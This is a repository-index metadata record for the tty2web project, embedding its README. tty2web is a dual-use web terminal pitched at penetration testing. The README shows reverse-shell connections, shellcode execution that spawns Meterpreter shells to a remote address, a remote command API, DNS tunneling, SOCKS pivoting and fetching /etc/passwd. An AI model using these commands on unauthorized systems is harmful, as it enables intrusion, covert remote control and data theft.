{"id":13841791,"url":"https://github.com/kost/tty2web","last_synced_at":"2026-02-21T21:12:53.069Z","repository":{"id":42984154,"uuid":"213529386","full_name":"kost/tty2web","owner":"kost","description":"Share your terminal as a web application in bind/reverse mode","archived":false,"fork":false,"pushed_at":"2024-03-13T23:09:02.000Z","size":7615,"stargazers_count":131,"open_issues_count":3,"forks_count":24,"subscribers_count":11,"default_branch":"master","last_synced_at":"2025-02-27T23:06:04.327Z","etag":null,"topics":["gotty","hacktober","hacktoberfest","tty","web"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/kost.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2019-10-08T02:18:56.000Z","updated_at":"2025-02-04T16:11:09.000Z","dependencies_parsed_at":"2024-06-20T07:13:59.963Z","dependency_job_id":"e502b13d-5568-4841-bb77-f3e37014fabc","html_url":"https://github.com/kost/tty2web","commit_stats":null,"previous_names":[],"tags_count":26,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kost%2Ftty2web","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kost%2Ftty2web/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kost%2Ftty2web/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/kost%2Ftty2web/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/kost","download_url":"https://codeload.github.com/kost/tty2web/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243858056,"owners_count":20359271,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["gotty","hacktober","hacktoberfest","tty","web"],"created_at":"2024-08-04T17:01:21.243Z","updated_at":"2026-02-21T21:12:53.063Z","avatar_url":"https://github.com/kost.png","language":"Go","readme":"# ![](https://raw.githubusercontent.com/kost/tty2web/master/resources/favicon.png) tty2web - Share your terminal as a web application (bind/reverse)\n\n[![MIT License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)][license]\n\n[release]: https://github.com/kost/tty2web/releases\n\n[license]: https://github.com/kost/tty2web/blob/master/LICENSE\n\ntty2web is a simple command line tool that turns your CLI tools into web applications. it is based on [Gotty](https://github.com/yudai/gotty), but heavily improved.\n\nImprovements include:\n\n- implementation of bind and reverse mode (useful for penetration testing/NAT traversal),\n- DNS tunnel support - (sub)domain you control is required\n- bidirectional file transfer (download/upload)\n- regeorg/SOCKS 5 support (bind/reverse mode)\n- API support (run commands over API)\n- support for Windows (and conpty!)\n- components upgrade (go and js including xterm.js)\n\n![Screenshot](https://raw.githubusercontent.com/kost/tty2web/master/screenshot.gif)\n\n# Installation\n\nDownload the latest stable binary file from the [Releases](https://github.com/kost/tty2web/releases) page. Note that the release marked `Pre-release` is built for testing purpose, which can include unstable or breaking changes. Download a release marked [Latest release](https://github.com/kost/tty2web/releases/latest) for a stable build.\n\n(Files named with `darwin_amd64` are for Mac OS X users)\n\n## `go install` Installation (Development)\n\nIf you have a Go language environment, you can install tty2web with the `go install` command. However, this command builds a binary file from the latest master branch, which can include unstable or breaking changes. tty2web requires go1.18 or later (embed directive and dependency github.com/urfave/cli have strings.Builder). Also, note that you have to checkot source code and then run go install due to using forked version of pty module.\n\n```sh\n$ git clone github.com/kost/tty2web\n$ cd tty2web\n$ go install\n```\n\nI would suggest to build it with following commands (make sure that you have $GOPATH set to valid value):\n\n```sh\ngit clone https://github.com/kost/tty2web $GOPATH/src/tty2web\ncd $GOPATH/src/tty2web\nmake tools\nmake tty2web\n```\n\n\n# Usage\n\n Usage: tty2web [options] \u003ccommand\u003e [\u003carguments...\u003e]\n\nRun `tty2web` with your preferred command as its arguments (e.g. `tty2web top`).\n\nBy default, tty2web starts a web server at port 8080. Open the URL on your web browser and you can see the running command as if it were running on your terminal.\n\n# Example usage\n\nBind mode is simple, specify port to listen and command to run (add -w if you want to interact):\n\n tty2web --port 8081 top\n\nPoint your web browser to IP and port 8081 in order to see output of top. Add -w if you want to interact directly in the browser.\n\nFor reverse mode, you need to start listener first:\n\n tty2web --listen :4444 --server 127.0.0.1:8000 --password test\n\nAfter having listener running, you can start client to connect to the listener:\n\n tty2web --connect 192.168.1.1:4444 --password test -w /bin/sh\n\nPoint your web browser to \u003chttp://127.0.0.1:8000\u003e\n\n## Options\n\n```\n --address value, -a value IP address to listen (default: \"0.0.0.0\") [$TTY2WEB_ADDRESS]\n --port value, -p value Port number to listen (default: \"8080\") [$TTY2WEB_PORT]\n --permit-write, -w Permit clients to write to the TTY (BE CAREFUL) (default: false) [$TTY2WEB_PERMIT_WRITE]\n --credential value, -c value Credential for Basic Authentication (ex: user:pass, default disabled) [$TTY2WEB_CREDENTIAL]\n --random-url, -r Add a random string to the URL (default: false) [$TTY2WEB_RANDOM_URL]\n --enable-webgl Enable WebGL renderer (default: false) [$TTY2WEB_ENABLE_WEBGL]\n --all Turn on all features: download /, upload /, api, regeorg, ... (default: false) [$TTY2WEB_ALL]\n --api Enable API for executing commands on the system (BE CAREFUL!) (default: false) [$TTY2WEB_API]\n --sc Enable API for executing sc on the system (BE CAREFUL!) (default: false) [$TTY2WEB_SC]\n --regeorg Enable socks4/socks5 proxy using regeorg (default: false) [$TTY2WEB_REGEORG]\n --random-url-length value Random URL length (default: 8) [$TTY2WEB_RANDOM_URL_LENGTH]\n --url value Specify string for the URL [$TTY2WEB_URL]\n --jsurl value Specify string for custom URL serving Javascript files (useful for DNS) [$TTY2WEB_JSURL]\n --download value Serve files to download from specified dir [$TTY2WEB_DOWNLOAD]\n --upload value Enable uploading of files to the specified dir (BE CAREFUL!) [$TTY2WEB_UPLOAD]\n --tls, -t Enable TLS/SSL (default: false) [$TTY2WEB_TLS]\n --tls-crt value TLS/SSL certificate file path (default: \"~/.tty2web.crt\") [$TTY2WEB_TLS_CRT]\n --tls-key value TLS/SSL key file path (default: \"~/.tty2web.key\") [$TTY2WEB_TLS_KEY]\n --tls-ca-crt value TLS/SSL CA certificate file for client certifications (default: \"~/.tty2web.ca.crt\") [$TTY2WEB_TLS_CA_CRT]\n --index value Custom index.html file [$TTY2WEB_INDEX]\n --title-format value Title format of browser window (default: \"{{ .command }}@{{ .hostname }}\") [$TTY2WEB_TITLE_FORMAT]\n --dns value Use domain for DNS tunneling (ex. example.com) [$TTY2WEB_DNS]\n --dnslisten value Listen for reverse connection agents (ex. 0.0.0.0:53) [$TTY2WEB_DNSLISTEN]\n --dnskey value Password/Key to use for DNS tunnel [$TTY2WEB_DNSKEY]\n --dnsdelay value Delay time between polling for DNS requests (default: \"200ms\") [$TTY2WEB_DNSDELAY]\n --listen value Listen for reverse connection agents (ex. 0.0.0.0:4444) [$TTY2WEB_LISTEN]\n --listencert value Certificate and key for listen server (ex. mycert) [$TTY2WEB_LISTENCERT]\n --server value Server for forwarding reverse connections (ex. 127.0.0.1:6000) (default: \"127.0.0.1:6000\") [$TTY2WEB_SERVER]\n --password value Password for reverse server connection [$TTY2WEB_PASSWORD]\n --connect value Connect to host for reverse connection (ex. 192.168.1.1:4444) [$TTY2WEB_CONNECT]\n --proxy value Use proxy for reverse server connection (ex. 192.168.1.1:8080) [$TTY2WEB_PROXY]\n --proxyauth value Use proxy authentication for reverse server connection (ex. DOMAIN/user:password) [$TTY2WEB_PROXYAUTH]\n --useragent value Use user agent for reverse server connection (ex. Mozilla) [$TTY2WEB_USERAGENT]\n --reconnect Enable reconnection (default: false) [$TTY2WEB_RECONNECT]\n --verbose Enable verbose messages (default: false) [$TTY2WEB_VERBOSE]\n --reconnect-time value Time to reconnect (default: 10) [$TTY2WEB_RECONNECT_TIME]\n --max-connection value Maximum connection to tty2web (default: 0) [$TTY2WEB_MAX_CONNECTION]\n --once Accept only one client and exit on disconnection (default: false) [$TTY2WEB_ONCE]\n --timeout value Timeout seconds for waiting a client(0 to disable) (default: 0) [$TTY2WEB_TIMEOUT]\n --permit-arguments Permit clients to send command line arguments in URL (e.g. http://example.com:8080/?arg=AAA\u0026arg=BBB) (default: false) [$TTY2WEB_PERMIT_ARGUMENTS]\n --width value Static width of the screen, 0(default) means dynamically resize (default: 0) [$TTY2WEB_WIDTH]\n --height value Static height of the screen, 0(default) means dynamically resize (default: 0) [$TTY2WEB_HEIGHT]\n --ws-origin value A regular expression that matches origin URLs to be accepted by WebSocket. No cross origin requests are acceptable by default [$TTY2WEB_WS_ORIGIN]\n --term value Terminal name to use on the browser, one of xterm or hterm. (default: \"xterm\") [$TTY2WEB_TERM]\n --close-signal value Signal sent to the command process when tty2webclose it (default: SIGHUP) (default: 1) [$TTY2WEB_CLOSE_SIGNAL]\n --close-timeout value Time in seconds to force kill process after client is disconnected (default: -1) (default: -1) [$TTY2WEB_CLOSE_TIMEOUT]\n --config value Config file path (default: \"~/.tty2web\") [$TTY2WEB_CONFIG]\n --help Displays help (default: false)\n --version, -v print the version\n```\n\n### Config File\n\nYou can customize default options and your terminal (hterm) by providing a config file to the `tty2web` command. tty2web loads a profile file at `~/.tty2web` by default when it exists.\n\n // Listen at port 9000 by default\n port = \"9000\"\n\n // Enable TSL/SSL by default\n enable_tls = true\n\n // hterm preferences\n // Smaller font and a little bit bluer background color\n preferences {\n font_size = 5\n background_color = \"rgb(16, 16, 32)\"\n }\n\nSee the [`.tty2web`](https://github.com/kost/tty2web/blob/master/.tty2web) file in this repository for the list of configuration options.\n\n### Security Options\n\nBy default, tty2web doesn't allow clients to send any keystrokes or commands except terminal window resizing. When you want to permit clients to write input to the TTY, add the `-w` option. However, accepting input from remote clients is dangerous for most commands. When you need interaction with the TTY for some reasons, consider starting tty2web with tmux or GNU Screen and run your command on it (see \"Sharing with Multiple Clients\" section for detail).\n\nTo restrict client access, you can use the `-c` option to enable the basic authentication. With this option, clients need to input the specified username and password to connect to the tty2web server. Note that the credentical will be transmitted between the server and clients in plain text. For more strict authentication, consider the SSL/TLS client certificate authentication described below.\n\nThe `-r` option is a little bit casualer way to restrict access. With this option, tty2web generates a random URL so that only people who know the URL can get access to the server.\n\nAll traffic between the server and clients are NOT encrypted by default. When you send secret information through tty2web, we strongly recommend you use the `-t` option which enables TLS/SSL on the session. By default, tty2web loads the crt and key files placed at `~/.tty2web.crt` and `~/.tty2web.key`. You can overwrite these file paths with the `--tls-crt` and `--tls-key` options. When you need to generate a self-signed certification file, you can use the `openssl` command.\n\n```sh\nopenssl req -x509 -nodes -days 9999 -newkey rsa:2048 -keyout ~/.tty2web.key -out ~/.tty2web.crt\n```\n\n(NOTE: For Safari uses, see [how to enable self-signed certificates for WebSockets](http://blog.marcon.me/post/24874118286/secure-websockets-safari) when use self-signed certificates)\n\nFor additional security, you can use the SSL/TLS client certificate authentication by providing a CA certificate file to the `--tls-ca-crt` option (this option requires the `-t` or `--tls` to be set). This option requires all clients to send valid client certificates that are signed by the specified certification authority.\n\n## File transfer\n\nFile transfer is supported by using standard HTTP protocol. It is possible to upload and download. It is not enabled by default. You need to specifically enable upload and/or download.\nIt works both in bind and reverse mode.\n\n### Download\n\nStart tty2web server with --download dir specified. If you need access to root - specify root(/):\n\n```sh\ntty2web --port 8080 --download / -w bash\n```\n\nNow you can download files by pointing browser to \u003chttp://127.0.0.1:8080/dl/\u003e or with simple curl command:\n\n```sh\ncurl http://127.0.0.1:8080/dl/etc/passwd\n```\n\nIt will download /etc/passwd file with curl.\n\n### Upload\n\nStart tty2web server with --upload dir specified. If you need access to root - specify root(/):\n\n```sh\ntty2web --port 8080 --upload /tmp -w bash\n```\n\nNow you can upload file by pointing browser to \u003chttp://127.0.0.1:8080/ul/\u003e or with simple curl command:\n\n```sh\ncurl -F \"f=@/etc/passwd\" -F \"s=upload\" http://127.0.0.1:8080/ul/\n```\n\nIt will upload file to the tty2web host to the /tmp/passwd file.\n\n## Sharing with Multiple Clients\n\ntty2web starts a new process with the given command when a new client connects to the server. This means users cannot share a single terminal with others by default. However, you can use terminal multiplexers for sharing a single process with multiple clients.\n\nFor example, you can start a new tmux session named `tty2web` with `top` command by the command below.\n\n```sh\n$ tty2web tmux new -A -s tty2web top\n```\n\nThis command doesn't allow clients to send keystrokes, however, you can attach the session from your local terminal and run operations like switching the mode of the `top` command. To connect to the tmux session from your terminal, you can use following command.\n\n```sh\n$ tmux new -A -s tty2web\n```\n\nBy using terminal multiplexers, you can have the control of your terminal and allow clients to just see your screen.\n\n### Quick Sharing on tmux\n\nTo share your current session with others by a shortcut key, you can add a line like below to your `.tmux.conf`.\n\n # Start tty2web in a new window with C-t\n bind-key C-t new-window \"tty2web tmux attach -t `tmux display -p '#S'`\"\n\n### Screen\n\nInstall screen:\n\n apt-get install screen\n\nStart a new session with `screen -S session-name` and connect to it with tty2web in another terminal window/tab through `screen -x session-name`.\nAll commands and activities being done in the first terminal tab/window will now be broadcasted by tty2web.\n\n## Playing with Docker\n\nWhen you want to create a jailed environment for each client, you can use Docker containers like following:\n\n```sh\n$ tty2web -w docker run -it --rm busybox\n```\n\n## API support\n\nStart with:\n```sh\n$ tty2web --api top\n```\n\nNow, you can execute commands within GET query parameter space:\n\n```sh\n$ curl http://127.0.0.1:8080/api/?whoami\nroot\n```\n\nor with POST parameter:\n```sh\n$ curl -d whoami http://127.0.0.1:8080/api/\nroot\n```\n\n## DNS support\n\nRequirement to have DNS tunneling working is that you have (sub)domain you control. You need to setup NS pointing to\nwhere you will host your DNS server. From there you will access to the client.\n\nStart DNS server:\n```sh\n$ tty2web --dns example.com --dnslisten :53 --server 127.0.0.1:8000\n```\n\nStart DNS client:\n```sh\n$ tty2web --dns example.com --dnskey \u003cdnskey\u003e top\n```\n\nNote that DNS tunneling can be slow.\n\nYou can speed up DNS boot up time to fetch initial javascript from Javascript on the Internet URL:\n\n```sh\n$ tty2web --dns example.com --dnskey \u003ckey\u003e --jsurl http://cdn.jsdelivr.net/gh/kost/tty2web/bindata/static/js/ top\n```\n\n## SC support\n\nStart with:\n```sh\n$ tty2web --sc top\n```\n\nNow, you can execute sc within POST query parameter space:\n\n```sh\n$ curl -d \"base64-encoded-string-with-sc\" -ivk http://127.0.0.1:8080/sc/\nroot\n```\n\nor from file with POST parameter:\n```sh\n$ curl -d \"@sc-127.0.0.1-4444.b64\" -ivk http://127.0.0.1:8080/sc/\n```\n\nspawn Meterpreter shell over tcp to 192.168.1.1:\n```sh\n$ curl -H 'Accept-Language: msf-tcp' 'http://127.0.0.1:8080/sc/?192.168.1.1:4444'\n```\n\nspawn Meterpreter shell over https to 192.168.1.1:\n```sh\n$ curl -H 'Accept-Language: msf-https' -d '192.168.1.1:4444' http://127.0.0.1:8080/sc/\n```\n\n## Regeorg support\n\nStart with:\n```sh\n$ tty2web --regeorg top\n```\n\nNow, you can start regeorg proxy:\n\n```sh\n$ pip install regeorg\n[..]\n$ reGeorgSocksProxy.py -u http://127.0.0.1:8080/regeorg/\n[..]\n[INFO ] Starting socks server [127.0.0.1:8888], tunnel at [http://127.0.0.1:8080/regeorg]\n[..]\n```\n\nNow, you can pivot using socks4/socks5 proxy available on 127.0.0.1:8888:\n\n```sh\n$ curl -x socks5://127.0.0.1:8888 http://192.168.1.96\n```\n\n## Development\n\nYou can build a binary using the following commands. There is basic Windows support, but it is limited. go1.16 or later is required.\n\n```sh\n# Install tools\nmake tools\n\n# Build\nmake\n```\n\nTo build the frontend part (JS files and other static files), you need `npm`.\n\n## Windows support\n\nThere is solid Windows support by using conpty. conpty support is available on Windows 10+ versions. It should fallback if conpty is not supported to standard stdin/stdout, but that is limited. In that fallback mode, cmd.exe did not work, but powershell.exe works:\n\n```DOS .bat\ntty2web.exe -w powershell.exe\n```\n\n## Architecture\n\ntty2web uses [xterm.js](https://xtermjs.org/) and [hterm](https://groups.google.com/a/chromium.org/forum/#!forum/chromium-hterm) to run a JavaScript based terminal on web browsers. tty2web itself provides a websocket server that simply relays output from the TTY to clients and receives input from clients and forwards it to the TTY. This hterm + websocket idea is inspired by [Wetty](https://github.com/krishnasrinivas/wetty).\n\n## Alternatives\n\n### Command line client\n\n- [gotty-client](https://github.com/moul/gotty-client): If you want to connect to tty2web or GoTTY server from your terminal\n\n### Terminal/SSH on Web Browsers\n\n- [gotty](https://github.com/yudai/gotty): Original gotty on which tty2web is based\n- [maintaned gotty](https://github.com/sorenisanerd/gotty): Maintained gotty\n- [Secure Shell (Chrome App)](https://chrome.google.com/webstore/detail/secure-shell/pnhechapfaindjhompbnflcldabbghjo): If you are a chrome user and need a \"real\" SSH client on your web browser, perhaps the Secure Shell app is what you want\n- [Wetty](https://github.com/krishnasrinivas/wetty): Node based web terminal (SSH/login)\n- [ttyd](https://tsl0922.github.io/ttyd): C port of GoTTY with CJK and IME support\n\n### Terminal Sharing\n\n- [tmate](http://tmate.io/): Forked-Tmux based Terminal-Terminal sharing\n- [termshare](https://termsha.re): Terminal-Terminal sharing through a HTTP server\n- [tmux](https://tmux.github.io/): Tmux itself also supports TTY sharing through SSH)\n\n# Credits\n\ntty2web is based on [gotty](https://github.com/yudai/gotty). To be specific, it is based on latest master branch at the time of the fork [commit on 13 Dec 2017](https://github.com/yudai/gotty/commit/a080c85cbc59226c94c6941ad8c395232d72d517)\n\n# License\n\nThe MIT License\n","funding_links":[],"categories":["Go"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkost%2Ftty2web","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fkost%2Ftty2web","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fkost%2Ftty2web/lists"}